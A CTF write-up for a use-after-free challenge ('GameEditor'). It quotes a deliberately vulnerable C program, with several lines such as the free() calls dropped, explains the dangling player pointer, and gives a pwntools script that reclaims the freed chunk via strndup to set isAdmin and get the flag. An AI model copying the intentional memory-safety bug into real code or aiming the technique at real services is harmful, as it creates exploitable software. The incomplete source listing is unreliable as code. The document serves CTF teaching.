
Sogeti Qualif - pwn - GameEditor

PWN: GameEditor (Free version) [ 486 points ] (Author: Touriste)

I was given this challenge after my teammates flagged it on the “sogeti qualif” platform. I wanted to give it a try, so here is my solution.


We were given a source code file and an IP address to try our payloads.

 * Filename: uaf.c
 * Author: Romain Bentz (pixis)
 * Description: Pown challenge for CTF Sogeti
 * Usage: ./uaf
 * Compilation: gcc -fPIE -fstack-protector-all -D_FORTIFY_SOURCE=2 -Wl,-z,now -Wl,-z,relro -o uaf uaf.c

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define MAX_NAME_SIZE   16

typedef struct player {
  char name[MAX_NAME_SIZE];
  int64_t isAdmin;
} player_t;

char *game_title=NULL;

Prevent double free
int is_player_freed=1;
int is_title_freed=1;

int main(int Count, char *Strings[])
    char line[128];
    player_t *player = NULL;
    while(1) {
            "  _______ _    _ ______    _____          __  __ ______ \n"
            " |__   __| |  | |  ____|  / ____|   /\\   |  \\/  |  ____|\n"
            "    | |  | |__| | |__    | |  __   /  \\  | \\  / | |__   \n"
            "    | |  |  __  |  __|   | | |_ | / /\\ \\ | |\\/| |  __|  \n"
            "    | |  | |  | | |____  | |__| |/ ____ \\| |  | | |____ \n"
            "    |_|  |_|  |_|______|  \\_____/_/    \\_\\_|  |_|______|\n"
            "                                                        \n"
            "                                                        \n"
            "Game information\n"
            "\tPlayer name\t-->\t%s\n"
            "\tGame title\t-->\t%s\n"
            "\tset <Player name>\t-\tSet player's name\n"
            "\ttitle <Game title>\t-\tSet game's title\n"
            "\tdel\t\t\t-\tDelete player's name\n"
            "\tlogin\t\t\t-\t[ADMIN AREA] Login into the game\n"
            "\texit\t\t\t-\tExit :(\n"
            "> ",
            player == NULL ? "(Not set)" : player->name, game_title == NULL ? "(Not set)" : game_title);

        if (fgets(line, sizeof(line), stdin) == NULL) break;

        if (strncmp(line, "set ", 4) == 0) {
            if (strlen(line + 4) > 1 && strlen(line + 4) <= MAX_NAME_SIZE) {
                // Free old player if set
                if (player != NULL && is_player_freed == 0) {
                    is_player_freed = 1;
                player = malloc(sizeof(player_t));
                // Fresh new player
                memset(player, 0, sizeof(player_t));
                is_player_freed = 0;
                // Replace trailing \n with \0
                strncpy(player->name, line + 4, strlen(line+4)-1);
                player->name[strlen(line+4)] = 0;

                // You're not admin, duh.
                player->isAdmin = 0;
            } else {
                printf("Maximum name size is %d characters\n", MAX_NAME_SIZE-1);

        if (strncmp(line, "title ", 6) == 0) {
            // Free old title if set
            if (game_title != NULL && is_title_freed == 0) {
                is_title_freed = 1;

            game_title = strndup(line+6, strlen(line+6)-1);
            is_title_freed = 0;

        if (strncmp(line, "del", 3) == 0) {
            // Free player if set
            if (player != NULL && is_player_freed == 0) {
                is_player_freed = 1;

        if (strncmp(line, "login", 5) == 0) {
            // If you're admin, go get your cookie !
            if (player != NULL) {
                printf("%s\n", player->isAdmin == 0 ? "Nop" : "SCE{flag}");

        if (strncmp(line, "exit", 4) == 0) {
            // Exit nicely without memory leaks
            if (player != NULL && is_player_freed == 0) {
            if (game_title != NULL && is_title_freed == 0) {
            // I'm quite polite.
            printf("'k Bye !\n");

            return EXIT_SUCCESS;
    return EXIT_SUCCESS;

The title makes it obvious, the goal of this challenge is to exploit a Use After Free vulnerability.


Obviously the goal of this challenge is to retrieve the flag stored in the binary.

if (strncmp(line, "login", 5) == 0) {
    // If you're admin, go get your cookie !
    if (player != NULL) {
        printf("%s\n", player->isAdmin == 0 ? "Nop" : "SCE{flag}");

If we manage to set player->isAdmin to a value that is anything but 0, the binary will drop the flag.


Since it seems to be a UAF challenge, let’s take a look at the pieces of the code responsible for allocation and/or disallocation of variables in memory.

Allocation routine

// Free old player if set
if (player != NULL && is_player_freed == 0) {
    is_player_freed = 1;
player = malloc(sizeof(player_t));

// Fresh new player
memset(player, 0, sizeof(player_t));

is_player_freed = 0;

// Replace trailing \n with \0
strncpy(player->name, line + 4, strlen(line+4)-1);
player->name[strlen(line+4)] = 0;

// You're not admin, duh.
player->isAdmin = 0;

It allocates sizeof(player_t) into the global variableplayer”. The first condition avoids double-free issues. We can see that the all fields are correctly initialized and thus, no vulnerability here.

Player points to memory:

player points to memory

Disallocation routine

// Free player if set
if (player != NULL && is_player_freed == 0) {
    is_player_freed = 1;

This part is more interesting: the memory allocated for the player_t structure is freed but the pointer stored in the player global variable is not rewritten.

We have here a dangling pointer: after this routine player will point to an address in the heap that is not allocated anymore.

Now player points to unallocated data in memory:

players points to unallocated data

Re-allocating memory at the same place


The goal here is to re-allocate memory. This newly allocated memory will be placed at the same position in the heap than the previous allocation.

Remember that the player player variable still points to the “old” memory area. After re-allocating memory, player will point to the new variable.

If we can control what’s inside this newly allocated memory, we can recreate a “fake” player which has the isAdmin field set to anything else than 0.

For instance, imagine we allocated an array that contains 24 bytes set to 0x42: players points to re-allocated data

The program would still read player as if it is a “player_t”. So when player->isAdmin == 0 ? "Nop" is evalaluted,player->isAdmin would return 0x4242424242424242.

How to allocate again?

We cannot use the allocation routine shown above because player->isAdmin is set to zero.

But we have another function that allocates stuff on the heap:

            // Free old title if set
            if (game_title != NULL && is_title_freed == 0) {
                is_title_freed = 1;

            game_title = strndup(line+6, strlen(line+6)-1);
            is_title_freed = 0;

Let’s see what strndup does:

man 3 strndup


The strdup() function returns a pointer to a new string which is a duplicate of the string s. Memory for the new string is obtained with malloc(3), and can be freed with free(3).

The strndup() function is similar, but copies at most n bytes. If s is longer than n, only n bytes are copied, and a terminating null byte (‘\0’) is added.

So strndup do call malloc and put a string in the memory! We can control the memory pointed by admin!


  • First we allocate memory for player (to set the pointer of player).
  • Then free player so we have a dangling pointer.
  • Allocate memory with the routine that uses strndup and fill the structure with 0.
  • Call the function that drops the flag.

Here is a snippet to do that:

from pwn import *

with remote("quals.shadow-league.org", 5001) as p:
    p.sendline("set t35h_ftw")      # Allocate player
    p.sendline("del")               # Free player
    p.sendline("title " + "A" * 23) # Re allocate memory on top of player
    p.sendline("login")             # Drop the flag.
    flag = "SCE{" + p.readline()
log.info("Found the flag: {}".format(flag))